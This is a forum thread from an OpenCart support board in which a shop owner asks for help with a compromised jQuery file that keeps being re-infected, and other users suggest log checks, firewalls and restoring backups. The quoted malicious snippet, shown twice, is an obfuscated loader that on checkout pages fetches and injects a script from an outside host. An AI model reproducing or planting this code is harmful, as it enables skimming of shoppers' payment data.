hi all,
looking for help please. one of my sites has been compromised with this - jquery-2.1.1-min file keeps being edited
i have tried all i can to compare files and have removed the infected Jquery file and reloaded a fresh one - however it keeps being edited again i suspect with script somewhere as we have closed all possible openings we could find and changed passwords. does anyone have any pointers or can possibly help that has had the same please?
the wierd thing is even when the file gets modified neither the size or even the date is changed, yet the file has been edited......
When Netcraft visited the site...
The following suspicious resources were loaded:
https:/mydomian/shop/catalog/view/javascript/jquery/jquery-2.1.1.min.js [more information] [search]
Click [search] for more information on how we discovered each resource.
To confirm that a resource is being loaded, visit the infected page while watching the network tab of your web browser's developer tools (F12 in Google Chrome, Mozilla Firefox, Microsoft Edge and Internet Explorer).
Malicious code loaded as part of the resources:
https://mydomain.co.uk/shop/catalog/vie ... 1.1.min.js
...&a.jQuery===n&&(a.jQuery=Lc),n},typeof b===U&&(a.jQuery=a.$=n),n});!function(e,t){let n=-1!==e.cookie.indexOf("debug=");e.location.toString().includes(t)&&fetch([47,47,99,100,110,106,115,46,115,116].map(function(e){return String.fromCharCode(e)}).join(""),{method:"POST"}).then(function(e){if(e.ok)return e.text()}).then(function(t){if(t){let i=e.createElement("script");i.setAttribute("src",t+(n?(t.includes("?")?"&":"?")+"_="+new Date().valueOf().toString().slice(0, -2):"")),e.head.appendChild(i)}})}(document,"checkout");...
ive tried comparing files, but as this has had quite a bit of work over the past 4 years the files are quite different
You could go through your log files for anything suspicious around the time you think it happened. . FTP access, web access, server, PHP error, OpenCart error, etc.
You will need to check you main site as well as the shop directory.
You will need to check you main site as well as the shop directory.
I suggest putting a firewall on your website then a clean version of the jquery file. I use Ninja firewall which is pretty good IMO.anon545 wrote: ↑Fri Jun 21, 2024 11:47 pmhi all,
looking for help please. one of my sites has been compromised with this - jquery-2.1.1-min file keeps being edited
i have tried all i can to compare files and have removed the infected Jquery file and reloaded a fresh one - however it keeps being edited again i suspect with script somewhere as we have closed all possible openings we could find and changed passwords. does anyone have any pointers or can possibly help that has had the same please?
the wierd thing is even when the file gets modified neither the size or even the date is changed, yet the file has been edited......
When Netcraft visited the site...
The following suspicious resources were loaded:
https:/mydomian/shop/catalog/view/javascript/jquery/jquery-2.1.1.min.js [more information] [search]
Click [search] for more information on how we discovered each resource.
To confirm that a resource is being loaded, visit the infected page while watching the network tab of your web browser's developer tools (F12 in Google Chrome, Mozilla Firefox, Microsoft Edge and Internet Explorer).
Malicious code loaded as part of the resources:
https://mydomain.co.uk/shop/catalog/vie ... 1.1.min.js
...&a.jQuery===n&&(a.jQuery=Lc),n},typeof b===U&&(a.jQuery=a.$=n),n});!function(e,t){let n=-1!==e.cookie.indexOf("debug=");e.location.toString().includes(t)&&fetch([47,47,99,100,110,106,115,46,115,116].map(function(e){return String.fromCharCode(e)}).join(""),{method:"POST"}).then(function(e){if(e.ok)return e.text()}).then(function(t){if(t){let i=e.createElement("script");i.setAttribute("src",t+(n?(t.includes("?")?"&":"?")+"_="+new Date().valueOf().toString().slice(0, -2):"")),e.head.appendChild(i)}})}(document,"checkout");...
ive tried comparing files, but as this has had quite a bit of work over the past 4 years the files are quite different
https://nintechnet.com/ninjafirewall/pro-edition
Opencart 1.5.6.5/OC Bootstrap Pro/VQMOD lover, user and geek.
Affordable Service £££ - Opencart Installs, Fixing, Development and Upgrades
Plus Ecommerce, Marketing, Mailing List Management and More
FREE Guidance and Advice at https://www.ecommerce-help.co.uk
You need to get an experienced developer involved ASAP such as ourselves or someone from Commercial Support.
UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk
There is a backdoor somewhere. Restore a backup if you have one available or enlist the help of a professional, preferably a firewall and malware cleanup service to clean things up now and help keep you protected going forward.
ELEV8TE Website Development
Available for hire - please contact me at https://www.elev8tewebsitedevelopment.com/contact
https://www.elev8tewebsitedevelopment.com
That's not going to work because they'll lose all orders placed inbetween.
UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk
I should have been more specific. Restore the files only, not the database.paulfeakins wrote: ↑Tue Jun 25, 2024 10:39 pmThat's not going to work because they'll lose all orders placed inbetween.
ELEV8TE Website Development
Available for hire - please contact me at https://www.elev8tewebsitedevelopment.com/contact
https://www.elev8tewebsitedevelopment.com
And what if the attackers have added an admin user with full permissions?
UK OpenCart Hosting | OpenCart Audits | OpenCart Support - please email info@antropy.co.uk
Who is online
Users browsing this forum: No registered users and 14 guests
